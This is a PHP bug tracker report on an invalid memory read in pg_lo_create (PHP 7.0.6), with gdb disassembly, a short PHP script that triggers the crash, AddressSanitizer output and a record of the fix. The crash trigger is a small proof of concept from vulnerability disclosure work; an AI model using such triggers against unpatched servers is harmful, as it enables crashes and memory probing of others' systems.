php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72197 pg_lo_create arbitrary read
Submitted: 2016-05-11 12:48 UTC Modified: 2016-05-11 16:16 UTC
From: fernando at null-life dot com Assigned:
Status: Closed Package: PostgreSQL related
PHP Version: 7.0.6 OS: Linux
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: fernando at null-life dot com
New email:
PHP Version: OS:

 

 [2016-05-11 12:48 UTC] fernando at null-life dot com
Description:
------------
When passing a negative number to the pg_lo_create, it will use this value as a resource and then call zend_fetch_resource2 with it, causing an invalid read.

https://github.com/php/php-src/blob/PHP-7.0/ext/pgsql/pgsql.c#L3189

I believe the issue is caused because the function accepts a mixed type data instead of only a resource here.

Reading symbols from /home/user/php-7.0/sapi/cli/php...done.
(gdb) b zend_fetch_resource2
Breakpoint 1 at 0x847a4cd: file /home/user/php-7.0/Zend/zend_list.c, line 104.
(gdb) r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, zend_fetch_resource2 (res=0xffff8000, resource_type_name=0xf404d1f4 "PostgreSQL link", resource_type1=44, resource_type2=45) at /home/user/php-7.0/Zend/zend_list.c:104  // !! res= 0xffff8000 = -32768
(gdb) x/10i $eip
=> 0x847a4cd <zend_fetch_resource2+30>: mov    %gs:0x14,%eax
   0x847a4d3 <zend_fetch_resource2+36>: mov    %eax,-0xc(%ebp)
   0x847a4d6 <zend_fetch_resource2+39>: xor    %eax,%eax
   0x847a4d8 <zend_fetch_resource2+41>: cmpl   $0x0,-0x1c(%ebp)
   0x847a4dc <zend_fetch_resource2+45>: je     0x847a504 <zend_fetch_resource2+85>
   0x847a4de <zend_fetch_resource2+47>: mov    -0x1c(%ebp),%eax             // load res pointer to arbitrary address (0xffff8000)
   0x847a4e1 <zend_fetch_resource2+50>: mov    0xc(%eax),%eax               // try read res->type element (0xffff8000 + 0xc)
   0x847a4e4 <zend_fetch_resource2+53>: cmp    0x10(%ebp),%eax
   0x847a4e7 <zend_fetch_resource2+56>: jne    0x847a4f1 <zend_fetch_resource2+66>
   0x847a4e9 <zend_fetch_resource2+58>: mov    -0x1c(%ebp),%eax

Test script:
---------------
<?php

$var1=-32768;
$var2="12";
pg_lo_create($var1, $var2);


Expected result:
----------------
No crash

Actual result:
--------------
ASAN:SIGSEGV
=================================================================
==4544==ERROR: AddressSanitizer: SEGV on unknown address 0xffff800c (pc 0x096b1fdc bp 0x0000002d sp 0xffece8c0 T0)
    #0 0x96b1fdb in zend_fetch_resource2 /home/user/php-7.0asan/Zend/zend_list.c:106
    #1 0xf1c368e8 in zif_pg_lo_create /home/user/php-7.0asan/ext/pgsql/pgsql.c:3231
    #2 0x9a31522 in ZEND_DO_ICALL_SPEC_HANDLER /home/user/php-7.0asan/Zend/zend_vm_execute.h:586
    #3 0x980f979 in execute_ex /home/user/php-7.0asan/Zend/zend_vm_execute.h:414
    #4 0x9b29bf2 in zend_execute /home/user/php-7.0asan/Zend/zend_vm_execute.h:458
    #5 0x95e8bcc in zend_execute_scripts /home/user/php-7.0asan/Zend/zend.c:1427
    #6 0x932dfeb in php_execute_script /home/user/php-7.0asan/main/main.c:2494
    #7 0x9b32370 in do_cli /home/user/php-7.0asan/sapi/cli/php_cli.c:974
    #8 0x80a6596 in main /home/user/php-7.0asan/sapi/cli/php_cli.c:1344
    #9 0xf6c02636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    #10 0x80a6b1a  (/ramdisk/php-70/sapi/cli/php+0x80a6b1a)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/php-7.0asan/Zend/zend_list.c:106 zend_fetch_resource2
==4544==ABORTING

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-05-11 16:16 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-05-12 09:41 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=7f6e285430e8ec8109085a24978796fc99813498
Log: Fixed bug #72197 pg_lo_create arbitrary read
 [2016-05-12 09:41 UTC] ab@php.net
-Status: Open +Status: Closed
 [2016-07-20 11:31 UTC] davey@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=7f6e285430e8ec8109085a24978796fc99813498
Log: Fixed bug #72197 pg_lo_create arbitrary read
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Oct 08 12:01:26 2024 UTC